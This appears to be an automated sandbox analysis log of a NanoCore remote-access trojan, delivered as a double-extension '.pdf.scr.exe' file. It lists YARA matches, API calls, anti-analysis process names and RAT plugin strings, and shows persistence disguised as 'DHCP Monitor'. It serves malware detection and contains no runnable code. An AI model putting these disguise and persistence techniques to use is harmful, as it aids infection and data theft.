Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exe Code function: GetLocaleInfoW,GetNumberFormatW, 0_2_00CDAF0F
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Queries volume information: C:\Users\user\AppData\Local\Temp\RegSvcs.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe Queries volume information: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe VolumeInformation
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.dll VolumeInformation
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exe Code function: 0_2_00CDF654 cpuid 0_2_00CDF654
Source: C:\Windows\SysWOW64\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exe Code function: 0_2_00CDDF1E GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,GetModuleFileNameW,SetEnvironmentVariableW,GetLocalTime,_swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,CloseHandle, 0_2_00CDDF1E
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe Code function: 2_2_0034BCF2 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free, 2_2_0034BCF2
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe Code function: 2_2_0036E5F8 GetUserNameW, 2_2_0036E5F8
Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exe Code function: 0_2_00CCB146 GetVersionExW, 0_2_00CCB146
Source: itugx.exe, 00000002.00000003.400023583.0000000000EA5000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000002.00000003.399006405.0000000000E96000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000002.00000002.412932307.0000000000EA8000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000002.00000003.396010910.0000000000E8A000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000002.00000003.400917680.0000000000EA7000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000005.00000003.451422910.0000000001568000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000005.00000002.455510913.000000000156B000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000005.00000003.451597738.000000000156B000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000010.00000003.467505109.000000000146C000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000010.00000002.470674080.000000000146C000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000010.00000003.466572234.0000000001469000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: procexp.exe
Source: itugx.exe, 00000002.00000003.400023583.0000000000EA5000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000002.00000003.399006405.0000000000E96000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000002.00000002.412932307.0000000000EA8000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000002.00000003.396010910.0000000000E8A000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000002.00000003.400917680.0000000000EA7000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000005.00000003.451422910.0000000001568000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000005.00000002.455510913.000000000156B000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000005.00000003.451597738.000000000156B000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000010.00000003.467505109.000000000146C000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000010.00000002.470674080.000000000146C000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000010.00000003.466572234.0000000001469000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: regshot.exe

Stealing of Sensitive Information

Source: Yara match File source: 28.3.itugx.exe.146edb8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.3.itugx.exe.15c6de8.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.RegSvcs.exe.41b560b.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.3.itugx.exe.1530ec0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.3.itugx.exe.1530ec0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.3.itugx.exe.146edb8.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.RegSvcs.exe.60b0000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 21.3.itugx.exe.141ed90.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.3.itugx.exe.162fdf8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.3.itugx.exe.f085f0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 23.3.itugx.exe.deecc0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 23.3.itugx.exe.d85cb0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 21.3.itugx.exe.13b5d80.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 21.3.itugx.exe.13b5d80.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.3.itugx.exe.14c7eb0.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.3.itugx.exe.14c7eb0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 21.3.itugx.exe.13b5d80.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 23.3.itugx.exe.d85cb0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.3.itugx.exe.f71600.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.RegSvcs.exe.d00000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.3.itugx.exe.f085f0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.3.itugx.exe.1530ec0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 25.3.itugx.exe.19b7de8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.3.itugx.exe.162fdf8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 21.3.itugx.exe.13b5d80.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.RegSvcs.exe.41bb041.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.3.itugx.exe.f085f0.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.3.itugx.exe.1530ec0.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.RegSvcs.exe.60b4629.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.RegSvcs.exe.60b0000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.3.itugx.exe.f71600.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.3.itugx.exe.1405da8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.3.itugx.exe.14c7eb0.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.3.itugx.exe.15c6de8.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.3.itugx.exe.f71600.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 25.3.itugx.exe.1a20df8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.3.itugx.exe.162fdf8.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.3.itugx.exe.1405da8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 23.3.itugx.exe.deecc0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.3.itugx.exe.162fdf8.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 23.3.itugx.exe.deecc0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 25.3.itugx.exe.19b7de8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.3.itugx.exe.f71600.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 23.3.itugx.exe.d85cb0.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.3.itugx.exe.14c7eb0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.RegSvcs.exe.41bb041.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.3.itugx.exe.f085f0.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.3.itugx.exe.1405da8.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 23.3.itugx.exe.deecc0.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 23.3.itugx.exe.d85cb0.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.3.itugx.exe.15c6de8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.3.itugx.exe.15c6de8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 25.3.itugx.exe.1a20df8.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.3.itugx.exe.1405da8.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 21.3.itugx.exe.141ed90.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.RegSvcs.exe.41b07ce.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000010.00000003.455419127.0000000001530000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000003.455956530.000000000151D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.379717765.0000000000F09000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000003.445033484.0000000003E2F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000003.456804036.00000000014C7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.468974735.0000000004169000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000003.444608093.0000000001593000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.499747206.0000000001382000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000003.573295191.0000000001405000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000003.445168798.00000000015C6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000003.572597608.000000000143D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000019.00000003.544675872.0000000004778000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000019.00000003.543882986.00000000019ED000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000003.572853168.00000000013D2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.498827487.00000000013EB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.585880095.00000000060B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000003.455090351.00000000014FD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.381511725.0000000000F08000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.381281377.0000000003813000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.580107208.0000000003781000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000003.442020848.00000000015C7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000003.454885906.00000000014C8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.379880100.0000000000F71000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000003.519976244.0000000000D86000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.499159077.00000000013EE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000019.00000003.544569868.0000000001984000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.500004480.0000000003C6C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000003.443014017.00000000015FF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000003.572980994.0000000003F04000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000003.522419154.0000000000DBF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000003.456419289.0000000003AA0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000003.522729745.0000000000D52000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000003.456270575.0000000001494000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000003.442280554.00000000015FC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000019.00000003.544269018.00000000019F0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.500237895.00000000013B5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.462925300.0000000000D02000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000003.520896058.0000000000DBB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000003.521795477.0000000000DEE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.379756044.0000000000F3D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000003.523166921.0000000003588000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000003.443097060.000000000161A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.467749940.0000000003161000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000003.442615320.000000000162F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000003.455869267.0000000001501000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000019.00000003.544903428.00000000019B7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000003.572167005.000000000143B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000003.523729347.0000000000D85000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.380269423.0000000000F40000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000003.522501129.0000000000DDB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.380361986.0000000000F5C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.380642798.0000000000ED4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: itugx.exe PID: 5920, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: itugx.exe PID: 3300, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: itugx.exe PID: 4036, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RegSvcs.exe PID: 4736, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: itugx.exe PID: 5928, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: itugx.exe PID: 5420, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: itugx.exe PID: 5552, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: itugx.exe PID: 1712, type: MEMORYSTR
Source: itugx.exe Binary or memory string: WIN_81
Source: itugx.exe Binary or memory string: WIN_XP
Source: itugx.exe, 00000002.00000000.358747295.00000000003D3000.00000002.00000001.01000000.0000000A.sdmp Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
Source: itugx.exe Binary or memory string: WIN_XPe
Source: itugx.exe Binary or memory string: WIN_VISTA
Source: itugx.exe Binary or memory string: WIN_7
Source: itugx.exe Binary or memory string: WIN_8

Remote Access Functionality

Source: itugx.exe, 00000002.00000003.379717765.0000000000F09000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: NanoCore.ClientPluginHost
Source: itugx.exe, 00000002.00000003.381511725.0000000000F08000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: NanoCore.ClientPluginHost
Source: itugx.exe, 00000002.00000003.381281377.0000000003813000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: NanoCore.ClientPluginHost
Source: itugx.exe, 00000002.00000003.379880100.0000000000F71000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: NanoCore.ClientPluginHost
Source: itugx.exe, 00000002.00000003.379756044.0000000000F3D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: NanoCore.ClientPluginHost
Source: itugx.exe, 00000002.00000003.380269423.0000000000F40000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: NanoCore.ClientPluginHost
Source: itugx.exe, 00000002.00000003.380361986.0000000000F5C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: NanoCore.ClientPluginHost
Source: itugx.exe, 00000002.00000003.380642798.0000000000ED4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: NanoCore.ClientPluginHost
Source: RegSvcs.exe, 00000003.00000002.580107208.0000000003781000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: NanoCore.ClientPluginHost
Source: RegSvcs.exe, 00000003.00000002.580107208.0000000003781000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
Source: RegSvcs.exe, 00000003.00000002.580107208.0000000003781000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoProtectClient.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainNanoProtectClientClientPluginResourcesNanoProtectClient.My.ResourcesMySettingsMySettingsPropertyFunctionsNanoProtectClient.NanoProtectMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostInitializePluginNanoCore.ClientPluginIClientNetwork_loggingHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketparamsSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CulturevalueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsGetProtectDirectoryGetProtectFileCreateProtectFileKillNanoCoreSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeLogClientMessageSystem.IOFileExistsReferenceEqualsSystem.ReflectionAssemblyget_AssemblyCompilerGeneratedAttributeSettingsBaseSynchronizedEnvironmentSpecialFolderGetFolderPathPathCombineExceptionDirectoryDirectoryInfoCreateDirectoryFileStreamCreateProjectDataSetProjectErrorClearProjectErrorProcessGetCurrentProcessKillNanoProtectClient.Resources.resourcesDebuggableAttributeDebuggingModesCompilationRelaxationsAttributeRuntimeCompatibilityAttributeAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeNanoProtectClient.dlla[NanoProtect]: Checking for NanoProtect module..
Source: itugx.exe, 00000005.00000003.445033484.0000000003E2F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: NanoCore.ClientPluginHost
Source: itugx.exe, 00000005.00000003.444608093.0000000001593000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: NanoCore.ClientPluginHost
Source: itugx.exe, 00000005.00000003.445168798.00000000015C6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: NanoCore.ClientPluginHost
Source: itugx.exe, 00000005.00000003.442020848.00000000015C7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: NanoCore.ClientPluginHost
Source: itugx.exe, 00000005.00000003.443014017.00000000015FF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: NanoCore.ClientPluginHost
Source: itugx.exe, 00000005.00000003.442280554.00000000015FC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: NanoCore.ClientPluginHost
Source: itugx.exe, 00000005.00000003.443097060.000000000161A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: NanoCore.ClientPluginHost
Source: itugx.exe, 00000005.00000003.442615320.000000000162F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: NanoCore.ClientPluginHost
Source: itugx.exe, 00000010.00000003.455419127.0000000001530000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: NanoCore.ClientPluginHost
Source: itugx.exe, 00000010.00000003.455956530.000000000151D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: NanoCore.ClientPluginHost
Source: itugx.exe, 00000010.00000003.456804036.00000000014C7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: NanoCore.ClientPluginHost
Source: itugx.exe, 00000010.00000003.455090351.00000000014FD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: NanoCore.ClientPluginHost
Source: itugx.exe, 00000010.00000003.454885906.00000000014C8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: NanoCore.ClientPluginHost
Source: itugx.exe, 00000010.00000003.456270575.0000000001494000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: NanoCore.ClientPluginHost
Source: itugx.exe, 00000010.00000003.456419289.0000000003AA0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: NanoCore.ClientPluginHost
Source: itugx.exe, 00000010.00000003.455869267.0000000001501000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: NanoCore.ClientPluginHost
Source: RegSvcs.exe, 00000013.00000002.468974735.0000000004169000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: NanoCore.ClientPluginHost
